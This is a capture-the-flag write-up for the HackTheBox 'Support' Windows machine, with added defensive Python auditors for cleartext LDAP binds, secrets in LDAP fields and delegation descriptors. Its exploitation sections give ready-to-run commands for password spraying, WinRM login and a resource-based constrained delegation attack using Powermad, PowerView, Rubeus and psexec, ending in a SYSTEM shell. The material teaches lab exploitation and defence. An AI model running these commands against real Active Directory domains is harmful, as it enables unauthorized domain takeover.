## About

- Support is an Easy difficulty Windows machine that features an SMB share that allows anonymous authentication. After connecting to the share, an executable file is discovered that is used to query the machine's LDAP server for available users. Through reverse engineering, network analysis or emulation, the password that the binary uses to bind to the LDAP server is identified and can be used to make further LDAP queries. A user called `support` is identified in the users list, and the `info` field is found to contain his password, thus allowing for a WinRM connection to the machine. Once on the machine, domain information can be gathered through `SharpHound`, and `BloodHound` reveals that the `Shared Support Accounts` group, which the `support` user is a member of, has `GenericAll` privileges on the Domain Controller. A Resource Based Constrained Delegation attack is performed, and a shell as `NT Authority\System` is received.
## Reconnaissance & Enumeration

- The port scan reveals multiple open ports. As usual, LDAP, NetBIOS, SMB and similar ports are open.
- Using `smbclient` I enumerated the SMB shares and got the share list:

```shell
smbclient -L support.htb
```

- The interesting share here is `support-tools`.
- Using netexec I confirmed that guest login works (an arbitrary username with an empty password):

```shell
netexec smb support.htb -u sundeity -p ""
```

- Listing the shares as the guest user showed that we have access to two shares:

```shell
netexec smb support.htb -u sundeity -p "" --shares
```

- So I checked the `support-tools` share and, as the name suggests, it contains tools. Most of them are familiar to me, at least by name. I decided to go through all the zips from the share. Initially the zips didn't give me anything interesting, so I moved on to enumerate LDAP:

```shell
nmap -n -sV --script "ldap* and not brute" -p 389 support.htb
```

- Then I enumerated users over SMB with netexec and got the user list.
- I removed all the unwanted text from the list and stored the usernames in a file:

```shell
cat users.txt | grep "SidTypeUser" | cut -d '\' -f 2 | cut -d '(' -f 1 >> users-smb.txt
```
## UsersInfo.exe analysis

- Remember the file `UsersInfo.exe.zip` that we downloaded from the SMB share. At first I didn't notice it, but after a while I was stuck, and only then did I realize it was the one unfamiliar tool among the known tools in the share.
- Running `UsersInfo.exe` with wine, I can see it authenticate to LDAP to look up the user we requested; the tool checks whether that particular user exists in the DC and returns a message accordingly.
- For example, the tool returned the error `No such object`, meaning the requested user cannot be found in LDAP.
- This tool doesn't use any encryption when logging in to LDAP, so the password used for authentication is sent in clear text. If I capture the traffic in Wireshark I can get the password.
- In the LDAP traffic I can see it authenticate as the user `ldap` with that password. Now that I have a username and password, I can collect data for BloodHound.
- Getting data for BloodHound
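What Wireshark shows here is simply the LDAP BindRequest: a simple bind carries the password as a plain OCTET STRING inside the BER-encoded message. The Python below is an added example (not from the original post and not part of UsersInfo.exe) that builds such a bind request from constructed values, decodes it the way a passive network sensor would, and flags cleartext simple binds on 389/tcp. The bind name `ldap@support.htb` is taken from the writeup; the password and source address are placeholders.

```python
# Added example (not from the original post): decode an LDAP simple-bind
# request from raw TCP payload bytes, the way a passive sensor would, to show
# why an unencrypted bind on 389/tcp exposes the bind password.
# The traffic below is constructed; the bind name is the one from the writeup,
# the password and source address are placeholders.

LDAP_PORT = 389


def _tlv(tag: int, body: bytes) -> bytes:
    """Encode one BER TLV using the short-form length (fine for messages < 128 bytes)."""
    assert len(body) < 128, "short-form length only in this example"
    return bytes([tag, len(body)]) + body


def build_simple_bind(msg_id: int, name: str, password: str) -> bytes:
    """Construct the bytes an LDAP client sends for a simple bind (RFC 4511 BindRequest)."""
    bind_request = (
        _tlv(0x02, bytes([3]))             # version INTEGER 3
        + _tlv(0x04, name.encode())        # name LDAPDN (OCTET STRING)
        + _tlv(0x80, password.encode())    # authentication CHOICE: [0] simple -> context tag 0
    )
    # LDAPMessage ::= SEQUENCE { messageID INTEGER, protocolOp [APPLICATION 0] BindRequest }
    return _tlv(0x30, _tlv(0x02, bytes([msg_id])) + _tlv(0x60, bind_request))


def _read_tlv(buf: bytes, pos: int):
    """Read the TLV at pos (short or long-form length); return (tag, value, next_pos)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                      # long form: low 7 bits = number of length octets
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    if pos + length > len(buf):
        raise IndexError("truncated TLV")
    return tag, buf[pos:pos + length], pos + length


def parse_bind_request(payload: bytes):
    """Return {'message_id', 'name', 'method', 'password'} for a BindRequest, else None."""
    try:
        tag, message, _ = _read_tlv(payload, 0)
        if tag != 0x30:
            return None
        tag, msg_id, pos = _read_tlv(message, 0)
        if tag != 0x02:
            return None
        tag, op, _ = _read_tlv(message, pos)
        if tag != 0x60:                    # [APPLICATION 0] = BindRequest; anything else is not a bind
            return None
        _, _version, pos = _read_tlv(op, 0)
        _, name, pos = _read_tlv(op, pos)
        auth_tag, auth, _ = _read_tlv(op, pos)
    except IndexError:
        return None                        # truncated or malformed message
    result = {"message_id": int.from_bytes(msg_id, "big"), "name": name.decode(errors="replace")}
    if auth_tag == 0x80:                   # simple authentication: the password is right there
        result.update(method="simple", password=auth.decode(errors="replace"))
    else:                                  # [3] SaslCredentials (e.g. GSSAPI/Kerberos): no cleartext password
        result.update(method="sasl", password=None)
    return result


def find_cleartext_binds(flows):
    """flows: iterable of (src, dst_port, payload). Returns alert strings for simple binds
    carrying a non-empty password on plain 389/tcp. Binds inside LDAPS (636) or after
    StartTLS are TLS-wrapped, so their payload never parses as BER here."""
    alerts = []
    for src, dst_port, payload in flows:
        bind = parse_bind_request(payload)
        if dst_port == LDAP_PORT and bind and bind["method"] == "simple" and bind["password"]:
            alerts.append(f"{src}: cleartext simple bind as {bind['name']} "
                          f"(password length {len(bind['password'])})")
    return alerts


if __name__ == "__main__":
    # Constructed traffic: one cleartext bind like the one UsersInfo.exe makes, one SearchRequest.
    flows = [
        ("10.0.0.5", LDAP_PORT, build_simple_bind(1, "ldap@support.htb", "ExamplePass1!")),
        ("10.0.0.5", LDAP_PORT, _tlv(0x30, _tlv(0x02, b"\x02") + _tlv(0x63, b""))),
    ]
    for alert in find_cleartext_binds(flows):
        print(alert)
```

The port check is deliberately simple: a bind sent over LDAPS or after StartTLS is wrapped in TLS, so a sensor only ever sees parseable BER on plain 389/tcp, which is exactly the case worth alerting on and the reason to require LDAPS or signing for service accounts like this one.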
## Exploitation

- If we search the ldapsearch results, particularly the `info` field, we get another password. This was new to me, because I had never seen anything sensitive in an info field before.

```shell
ldapsearch -H ldap://support.htb -D 'ldap@support.htb' -w '<password>' -b "DC=support,DC=htb" | grep "info"
```

- In LDAP I got this password from the user `support@support.htb`.
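Passwords parked in free-form attributes like `info` or `description` are readable by every authenticated domain user, so this is worth auditing from the defender's side as well. The Python below is an added example (not from the original post): a small LDIF parser for `ldapsearch` output that handles comments, folded lines and base64 (`attr::`) values, plus a heuristic that flags password-looking values in free-form attributes. The LDIF sample is constructed for the example; the DNs follow the writeup's `DC=support,DC=htb` base and the secrets are placeholders.

```python
# Added example (not from the original post): parse ldapsearch LDIF output and
# flag password-looking values in free-form attributes such as info/description.
# The LDIF below is constructed for the example; the secrets are placeholders.
import base64
import re

FREEFORM_ATTRS = {"info", "description", "comment", "notes"}
LINE_RE = re.compile(r"^([A-Za-z][\w;.-]*)(::?) ?(.*)$")   # attr: value  |  attr:: base64value


def parse_ldif(text: str):
    """Return a list of {'dn': ..., 'attrs': {name: [values]}} from LDIF text.
    Handles '#' comments, folded lines (continuations start with a space)
    and base64-encoded values ('attr:: ...'). Attribute names are lower-cased."""
    logical = []
    for raw in text.splitlines():
        if raw.startswith(" ") and logical:
            logical[-1] += raw[1:]          # unfold: drop the single leading space
        else:
            logical.append(raw)
    entries, current = [], None
    for line in logical + [""]:             # trailing "" flushes the last entry
        if not line.strip():
            if current is not None:
                entries.append(current)
                current = None
            continue
        if line.startswith("#"):
            continue
        m = LINE_RE.match(line)
        if not m:
            continue
        attr, sep, value = m.group(1).lower(), m.group(2), m.group(3)
        if sep == "::":
            value = base64.b64decode(value).decode("utf-8", errors="replace")
        if attr == "dn":
            current = {"dn": value, "attrs": {}}
        elif current is not None:           # ignore trailer lines like "search: 2" outside entries
            current["attrs"].setdefault(attr, []).append(value)
    return entries


def looks_like_secret(value: str) -> bool:
    """Heuristic only: an explicit password keyword, or a single token of 8+ characters
    that contains a digit and mixes at least three character classes."""
    if re.search(r"passw|pwd", value, re.IGNORECASE):
        return True
    for token in value.split():
        if len(token) < 8 or not re.search(r"\d", token):
            continue
        classes = sum(bool(re.search(p, token)) for p in (r"[a-z]", r"[A-Z]", r"\d", r"[^\w]"))
        if classes >= 3:
            return True
    return False


def audit_freeform_attributes(ldif_text: str):
    """Return (dn, attribute, value) for every free-form attribute value that looks like a secret."""
    findings = []
    for entry in parse_ldif(ldif_text):
        for attr, values in entry["attrs"].items():
            if attr in FREEFORM_ATTRS:
                findings.extend((entry["dn"], attr, v) for v in values if looks_like_secret(v))
    return findings


# Constructed ldapsearch-style output: comments, a folded line, a base64 value, a trailer.
_B64_INFO = base64.b64encode(b"Temp pwd: Summer!23").decode()
SAMPLE_LDIF = f"""# extended LDIF
#
# base <DC=support,DC=htb> with scope subtree
dn: CN=support,CN=Users,DC=support,DC=htb
sAMAccountName: support
info: Example!Secret2024
memberOf: CN=Shared Support Accounts,CN=Groups,DC=support,DC=htb

dn: CN=ldap,CN=Users,DC=support,DC=htb
sAMAccountName: ldap
description: Service account
  used by UsersInfo.exe
info:: {_B64_INFO}

dn: CN=Guest,CN=Users,DC=support,DC=htb
description: Built-in account for guest access to the computer/domain

# search result
search: 2
result: 0 Success
"""

if __name__ == "__main__":
    for dn, attr, value in audit_freeform_attributes(SAMPLE_LDIF):
        print(f"{dn}: {attr} = {value!r}")
```

Feed it the full output of the `ldapsearch` command above (without the `grep`) and it reports the DN, attribute and value of every suspicious entry; the heuristic is intentionally loose, so review the hits by hand.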
- I checked the BloodHound data, and the user `support` is a member of three groups.
- For a change I used `crackmapexec` to password spray, which eventually confirmed the password for the `support` user:

```shell
crackmapexec winrm support.htb -u users-smb.txt -p '<password>'
```

- Using the newly discovered password I logged in over WinRM with `evil-winrm` as the user `support`:

```shell
evil-winrm -u support -p '<password>' -i support.htb
```

- Got the User flag.
## Privilege Escalation

- Looking at the BloodHound data, the user `support` is in a group called `Shared Support Accounts@Support.htb`. That group has GenericAll permissions over the Domain Controller itself.
- This privilege allows the trustee to manipulate the target object however they wish.
## Abusing GenericALL

- We can abuse this by following the help instructions in BloodHound for this privilege. Here I am going to create a fake computer under my control, which the DC will be configured to trust for delegation, in order to get a Kerberos ticket. Follow the steps below carefully.
- Required tools:
  - PowerView.ps1
  - Powermad.ps1
  - Rubeus.exe (prebuilt from SharpCollection)

### Step 1: Upload all the tools to the target system

- Do the following in the WinRM shell (`upload` is an evil-winrm built-in):

```powershell
cd C:\programdata
upload PowerView.ps1
upload Powermad.ps1
upload Rubeus.exe
```
### Step 2: Loading the scripts

```powershell
. .\PowerView.ps1
. .\Powermad.ps1
```

### Step 3: Creating a fake computer

```powershell
New-MachineAccount -MachineAccount <Computername> -Password $(ConvertTo-SecureString '<Password>' -AsPlainText -Force)
```

- We need the SID of the computer we just created, so we assign it to a variable:

```powershell
$fakesid = Get-DomainComputer <Computername> | select -expand objectsid
```
### Step 4: Configuring

- Now I'll configure the DC to trust my fake computer to make authorization decisions on its behalf. These commands build a security descriptor whose ACL contains an ACE for the fake computer's SID and write it to the DC's `msDS-AllowedToActOnBehalfOfOtherIdentity` attribute (`$TargetComputer` holds the DC's computer name; here the DC is `dc.support.htb`).

What is an ACL?

An ACL is a list of access control entries (ACEs) that define permissions for users or groups to access specific objects (like users, groups, computers, or organizational units) and their attributes. Purpose: ACLs ensure that only authorized users can access specific resources and perform specific actions, enhancing security and data protection.

```powershell
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($fakesid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer $TargetComputer | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
```
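The SDDL string above is worth understanding rather than pasting: `O:BA` sets the owner to BUILTIN\Administrators, and the single ACE `(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;<sid>)` grants the fake computer's SID every directory right, which is what makes the DC accept it for delegation. From the defender's side, the same attribute is what you audit: any SID in `msDS-AllowedToActOnBehalfOfOtherIdentity` on a DC that is not an expected one is a delegation backdoor. The Python below is an added example (not from the original post or the tools it uses) that parses an SDDL descriptor into its ACEs, expands the rights codes and lists unexpected trustees. It assumes you already have the descriptor in SDDL form (for instance by reading the attribute bytes and calling `RawSecurityDescriptor.GetSddlForm` in PowerShell); the SIDs used are constructed.

```python
# Added example (not from the original post): decode the SDDL descriptor that the
# writeup writes into msDS-AllowedToActOnBehalfOfOtherIdentity and list which
# SIDs it allows to act on behalf of the DC. All SIDs below are constructed.
import re

# Two-letter access-right codes from MS-DTYP as used in AD object ACEs (names are descriptive).
RIGHTS = {
    "CC": "DS_CREATE_CHILD", "DC": "DS_DELETE_CHILD", "LC": "DS_LIST_CONTENTS",
    "SW": "DS_SELF", "RP": "DS_READ_PROP", "WP": "DS_WRITE_PROP",
    "DT": "DS_DELETE_TREE", "LO": "DS_LIST_OBJECT", "CR": "DS_CONTROL_ACCESS",
    "SD": "DELETE", "RC": "READ_CONTROL", "WD": "WRITE_DAC", "WO": "WRITE_OWNER",
    "GA": "GENERIC_ALL", "GR": "GENERIC_READ", "GW": "GENERIC_WRITE", "GX": "GENERIC_EXECUTE",
}
ACE_TYPES = {"A": "ACCESS_ALLOWED", "D": "ACCESS_DENIED",
             "OA": "ACCESS_ALLOWED_OBJECT", "OD": "ACCESS_DENIED_OBJECT"}
ACE_RE = re.compile(r"\(([^)]*)\)")


def decode_rights(rights: str):
    """Expand 'CCDCLC...' into right names; a hex mask ('0x...') is passed through."""
    if rights.startswith("0x"):
        return [rights]
    if len(rights) % 2:
        raise ValueError(f"odd-length rights string: {rights!r}")
    codes = [rights[i:i + 2] for i in range(0, len(rights), 2)]
    unknown = [c for c in codes if c not in RIGHTS]
    if unknown:
        raise ValueError(f"unknown right codes: {unknown}")
    return [RIGHTS[c] for c in codes]


def parse_sddl(sddl: str):
    """Split an SDDL string into owner, group and the DACL's ACEs.
    ACE layout: (ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid)."""
    out = {"owner": None, "group": None, "dacl_flags": "", "dacl": []}
    for part in re.split(r"(?=(?:O|G|D|S):)", sddl):   # split in front of the O:, G:, D:, S: sections
        if part.startswith("O:"):
            out["owner"] = part[2:]
        elif part.startswith("G:"):
            out["group"] = part[2:]
        elif part.startswith("D:"):
            body = part[2:]
            out["dacl_flags"] = body.split("(", 1)[0]   # e.g. "P" or "AI"; empty in the writeup's string
            for ace in ACE_RE.findall(body):
                fields = ace.split(";")
                if len(fields) < 6:
                    raise ValueError(f"malformed ACE: ({ace})")
                ace_type, flags, rights, obj_guid, inh_guid, sid = fields[:6]
                out["dacl"].append({
                    "type": ACE_TYPES.get(ace_type, ace_type), "flags": flags,
                    "rights": decode_rights(rights), "object_type": obj_guid,
                    "inherited_object_type": inh_guid, "trustee": sid,
                })
    return out


def rbcd_trustees(sddl: str):
    """SIDs that an msDS-AllowedToActOnBehalfOfOtherIdentity descriptor allows to delegate."""
    return [ace["trustee"] for ace in parse_sddl(sddl)["dacl"] if ace["type"] == "ACCESS_ALLOWED"]


def unexpected_rbcd_trustees(sddl: str, approved_sids):
    """Trustees not on the approved list: on a DC this is what an auditor should alert on."""
    return [sid for sid in rbcd_trustees(sddl) if sid not in set(approved_sids)]


if __name__ == "__main__":
    fake_sid = "S-1-5-21-1111111111-2222222222-3333333333-1601"    # constructed fake-computer SID
    sddl = f"O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;{fake_sid})"  # same shape as the writeup's descriptor
    desc = parse_sddl(sddl)
    print("owner:", desc["owner"])                  # BA = BUILTIN\Administrators
    for ace in desc["dacl"]:
        print(ace["type"], ace["trustee"], ", ".join(ace["rights"]))
    print("unexpected:", unexpected_rbcd_trustees(sddl, approved_sids=[]))
```

Run against every computer object that carries the attribute (the DC above being the most important one), with `approved_sids` set to the SIDs your delegation design actually needs; on a DC that list is normally empty, so any trustee is a finding.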
### Step 5: Authenticate as the computer

```powershell
.\Rubeus.exe hash /password:<Password> /user:<ComputerName> /domain:support.htb
```

- Now copy the `rc4_hmac` hash from the output.
### Step 6: Get the Kerberos ticket

```powershell
.\Rubeus.exe s4u /user:<Computername>$ /rc4:<Hash> /impersonateuser:administrator /msdsspn:cifs/dc.support.htb /ptt
```

- The ticket is now obtained; we can see it base64-encoded in the output.
- Copy the ticket for Administrator and put it in a file called `ticket.kirbi.b64`.
- Remove all whitespace and unwanted lines. I did this in vim with the command `:%s/\s\+//g`.
- Now decode the base64 into a different file:

```shell
base64 -d ticket.kirbi.b64 > ticket.kirbi
```

- On Linux we have to convert the ticket from `kirbi` to `ccache` format in order to pass it.
- We can easily convert it with `ticketConverter.py`, one of the tools from the Impacket toolkit:

```shell
sudo /home/n_emperor/.local/share/pipx/venvs/netexec/bin/ticketConverter.py ticket.kirbi ticket.ccache
```

- Now pass the ticket and spawn a shell:

```shell
KRB5CCNAME=ticket.ccache psexec.py support.htb/administrator@dc.support.htb -k -no-pass
```
## End

- Secured the Root flag.